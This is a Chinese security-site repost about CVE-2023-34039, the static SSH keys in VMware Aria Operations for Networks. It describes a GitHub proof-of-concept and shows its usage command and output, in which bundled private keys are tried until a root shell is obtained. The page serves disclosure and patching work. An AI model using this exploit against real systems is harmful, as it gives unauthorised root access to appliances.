VMWare 静态 SSH 密钥 RCE (CVE-2023-34039)

admin 2024年8月7日22:43:40评论34 views字数 1460阅读4分52秒阅读模式
 

POC来源于Github请在虚拟环境中,进行使用。

CVE-2023-34039

CVE-2023-34039 VMWare Aria Operations for Networks (vRealize Network Insight) 的 POC 静态 SSH 密钥 RCE

技术分析

该漏洞的根本原因分析可以在我的博客上找到:

https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/

VMWare 静态 SSH 密钥 RCE (CVE-2023-34039)

概括

VMWare Aria Operations for Networks (vRealize Network Insight) 从版本 6.0 到 6.10 不会为 和support用户重新生成 ssh 密钥ubuntu,从而允许具有 SSH 访问权限的攻击者获得root对此产品的 shell 访问权限。

ProjectDiscovery Research的Harsh Jaiswal (@rootxharsh) 和Rahul Maini (@iamnoooob)向 VMWare 报告了此问题

我刚刚编写了这个漏洞利用程序(如果你可以这样称呼它的话),因为它基本上是一个 ssh 命令包装器。

用法

python CVE-2023-34039.py --target 192.168.1.16(!) VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)
(*) Exploit by Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_collector
(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_platform
(*) Trying key: keys/vrni-6.10.0/id_rsa_vnera_keypair_6.10.0_platform

********************************** ATTENTION ********************************** NTP Service is not healthy. IMPACT: It may affect the proper working of other services. ACTION: Restore the service using 'ntp' CLI command.********************************** ATTENTION **********************************support@vrni-platform-release:~$ sudo -iroot@vrni-platform-release:~# iduid=0(root) gid=0(root) groups=0(root)root@vrni-platform-release:~# hostnamevrni-platform-releaseroot@vrni-platform-release:~#

 

项目地址:

https://github.com/sinsinology/CVE-2023-34039

原文始发于微信公众号(Ots安全):VMWare 静态 SSH 密钥 RCE (CVE-2023-34039)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月7日22:43:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   VMWare 静态 SSH 密钥 RCE (CVE-2023-34039)https://cn-sec.com/archives/2002116.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息